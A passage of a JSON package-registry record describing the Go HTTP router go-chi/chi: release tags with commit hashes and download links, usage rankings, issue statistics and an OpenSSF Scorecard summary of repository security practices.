i/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.177Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":9.345852080216646,"dependent_packages_count":6.999148183520997,"stargazers_count":0.42444926529425825,"forks_count":0.6257877057855061,"average":4.348809308704352},"purl":"pkg:golang/gopkg.in/chi.v1","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/gopkg.in/chi.v1","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/gopkg.in/chi.v1","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/gopkg.in/chi.v1/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v1/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v1/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v1/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v1/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v1/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v1/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":14680475,"name":"github.com/Go-Chi/chi","ecosystem":"go","description":"","homepage":"https://github.com/Go-Chi/chi","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/Go-Chi/chi","keywords_array":[],"namespace":"github.com/Go-Chi","versions_count":2,"first_release_published_at":"2016-03-31T13:51:57.000Z","latest_release_published_at":"2026-08-12T02:06:13.502Z","latest_release_number":null,"last_synced_at":"2026-08-12T02:06:13.916Z","created_at":"2026-06-26T13:15:30.186Z","updated_at":"2026-08-12T02:06:13.917Z","registry_url":"https://pkg.go.dev/github.com/Go-Chi/chi","install_command":"go get github.com/Go-Chi/chi","documentation_url":"https://pkg.go.dev/github.com/Go-Chi/chi#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build 